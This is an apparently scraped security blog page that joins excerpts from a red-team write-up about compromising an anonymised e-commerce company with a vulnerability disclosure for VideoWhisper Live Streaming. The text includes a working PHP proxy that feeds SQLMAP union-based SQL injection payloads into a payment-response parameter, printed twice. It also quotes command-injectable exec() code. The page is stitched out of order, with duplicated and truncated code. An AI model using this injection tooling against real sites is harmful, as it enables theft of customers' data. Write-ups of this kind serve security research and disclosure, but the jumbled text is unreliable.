Remote Operation until last access (Part 2)

In Part 1, I outlined how during this Operation, I discovered an outdated WordPress. I researched plugins and the theme that were installed on the WordPress script and obtained reflected XSS, partially Local File Include, and time-based SQL injection.

If this was a normal pentest, this would be the end. I would write up the findings and recommendations. However, this was a remote operation. I was assessing a large corporation I am calling Target Corporate.

SQL Injection Exploitation

In Part 1, I used a Local File Include that turned to be useful to include a page that is vulnerable to SQL injection, I also created a POC regarding the SQL injection, In this part, I will explain how the time-based SQL injection was exploited.

I used the SQLMAP tool but the vulnerability can not be directly exploitable by SQLMAP, thus, I had to create a PHP page that acts as a proxy between SQLMAP and the vulnerable page and created the injection point that will be used by SQLMAP to launch successful exploitation.

<?php
$url="https://*********************";
$injection=$_GET['inj'];

post_it($url,$injection);

function post_it($url,$injection){
        $ch = curl_init();
        $post="custom=2' or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$injection."-- -|sssssss";

        curl_setopt($ch, CURLOPT_URL, "$url/?payment_response=paypal_response");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
            $post);

        //return the transfer as a string
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        echo $output;
        curl_close($ch);
}
?>

<?php

$url="https://*********************";

$injection=$_GET['inj'];

post_it($url,$injection);

function post_it($url,$injection){

$ch = curl_init();

$post="custom=2' or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$injection."-- -|sssssss";

curl_setopt($ch, CURLOPT_URL, "$url/?payment_response=paypal_response");

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS,

$post);

//return the transfer as a string

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$output = curl_exec($ch);

echo $output;

curl_close($ch);

}

The PHP page will be hosted on my localhost, it contains a user input called $inj that will be used to send the SQL injection payloads to the targeted vulnerable input in a good manner, I made it exploitable for SQLMAP to inject its time-based SQL injection payloads.

Remote Operation until last access (Part 1)

In this post, I will chronicle a remote operation that was executed. The operation took many weeks to achieve its target, I went from minimal information about the corporate into the total compromise of all customer’s users private information. The target is a large corporate with a sizable security program. For purposes of this blog, I will call them Target Corporate.

Target Corporate is a big E-commerce company that works in multiple countries. In this operation, I needed to do Web application Recon, source code review, exploitation, lateral movement and social engineering.

Let’s start

When I began this operation, I typically know nothing about their infrastructure operations. I needed to research the corporate and learn as much about their internal operations as possible.

I needed to look for outdated softwares and services that can be exploited. Maybe some applications with default passwords or custom web applications that might be vulnerable, looking for any resources that may be useful to gain more information.

Recon Phase

I spent hours doing recon at the target external systems. There were no obvious exploitable vulnerabilities on any of the applications that have been discovered. I found numerous web services and spent time investigating them. There was nothing in these tiny services.

I used Google search engine in addition to multiple tools to enumerate any reachable subdomains regarding Target Corporate, the most interesting subdomains were:

management.target.com (A software to Control customer data and transactions)
gmail.target.com (A software that is supported by google mail to provide a secure email login)
wordpress.target.com (WordPress software installed)

(Those are not the real names of the subdomains)

RCE Live Streaming webcam software

Today I am going to publicly disclose a vulnerability that I have discovered recently in VideoWhisper Live Streaming software. The software suffers from remote command execution vulnerability, specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands to be executed over the remote machine.

VideoWhisper Live Streaming provides web based live video streaming (from webcam or similar sources).

Live Streaming contains a web based application to broadcast video with realtime configuration of resolution, framerate, bandwidth, audio rate and also allows discussing with video subscribers.

VideoWhisper Live Streaming provides web based live video streaming (from webcam or similar sources).

Live Streaming contains a web based application to broadcast video with realtime configuration of resolution, framerate, bandwidth, audio rate and also allows discussing with video subscribers.

I decided to do a source code review over the VideoWhisper Live Streaming software as one of my researches.

General Review

It took me many hours reading the source code, many files caught my attention, ls_transcoder.php was one of these files that considered to be suspicious.

<?php
include("header.php");
?>
<div class="info">
<?php
if ($stream=$_GET['n']){




include_once("incsan.php");
sanV($stream);
include_once("settings.php");

echo "<H3>".$stream."</h3>";

}
$upath = getcwd() . "/uploads/$stream/";


$cmd = "ps aux | grep '/i_$stream -i rtmp'";
exec($cmd, $output, $returnvalue);

<?php

include("header.php");

<?php

if ($stream=$_GET['n']){

include_once("incsan.php");

sanV($stream);

include_once("settings.php");

echo "<H3>".$stream."</h3>";

}

$upath = getcwd() . "/uploads/$stream/";

$cmd = "ps aux | grep '/i_$stream -i rtmp'";

exec($cmd, $output, $returnvalue);

In line 21, $stream parameter was noticed to be inserted in a command that was sent to exec function in line 22, exec function executes commands over the remote machine and returns the output to an array that was sent as a second argument.

$stream parameter is a user-controlled input sent through the GET request in line 6, however, there is a filter function sanV($stream) in line 12, if I am able to bypass this filter then I will be able to gain a command injection over the application.

Ahmed Elselhab Blog

My write ups

Category: Source Code Review

Remote Operation until last access (Part 2)

SQL Injection Exploitation

Remote Operation until last access (Part 1)

Let’s start

Recon Phase

RCE Live Streaming webcam software

General Review